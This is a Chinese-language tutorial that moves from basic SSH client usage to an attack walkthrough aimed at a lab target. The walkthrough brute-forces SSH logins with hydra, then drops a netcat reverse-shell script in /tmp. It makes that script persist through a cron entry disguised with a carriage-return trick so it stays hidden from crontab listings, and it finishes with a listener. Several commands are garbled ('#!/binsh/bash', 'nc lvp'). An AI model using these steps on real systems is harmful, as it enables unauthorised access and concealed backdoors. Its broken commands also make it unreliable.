Ssh爆破

SSH简介

Secure Shell （安全外壳协议，简称 SSH ）是一种加密的网络传输协议，可在不安全的网络中为网络服务提供安全的传输环境。SSH通过在网络中创建安全隧道来实现SSH客户端与服务器之间的连接。

SSH最常见的用途是远程登录系统

SSH客户端

安装

OpenSSH 的客户端是二进制程序 ssh。它在 Linux/Unix 系统的位置是/usr/local/bin/ssh，Windows 系统的位置是\Program Files\OpenSSH\bin\ssh.exe

查看是否安装了SSH

ssh -V

基本用法

# 基本命令
ssh hostname
# 指定登录用户
ssh user@hostname
# 不用 @ 分隔
ssh -l user hostname
# 指定端口号（默认 22）
ssh -p port user@hostname
# 配置用户,主机名和端口
# node1 需要配置在 Users/用户名/.ssh/config 配置文件中
# Host node1
#	Hostname xxx.xxx.xxx.xxx
#	Port port
#	User roots
ssh node1
# 执行远程命令
ssh user@hostname command
# 需要互动式 shell 环境
ssh -t user@hostname command

SSH爆破

前置条件：配置一个开启了SSH服务的靶机

使用hydra进行爆破

1	hydra -L users.txt -P [-vV] password.txt ssh://靶机IP

注意：这里的users.txt 和password.txt 可以使用自己的字典也可以使用kali自带的字典

使用-vV可以显式详细的爆破结果

SSH登录

1
2
3

ssh root @192.168.19.128
#root 是要登录的用户名
@后面是要登录的主机地址

创建隐藏任务

kali进入 /tmp目录，创建创建文件task.sh，文件内容如下：

(反弹shell)

1 2	#!/binsh/bash nc 192.168.19.128 7777 -e /bin/bash

给task文件赋予可执行权限
1
chmod +x task.sh
创建计划任务

创建文件create_task.sh,内容如下

意思是每隔一分钟执行一次
1
2
(crontab -l;printf "* * * * * /tmp/task.sh;\rno crontw-wab for
'whoami'%100c\n")|crontab -
同样给create_tash.sh赋予执行权限
创建监听任务
1
nc lvp 7777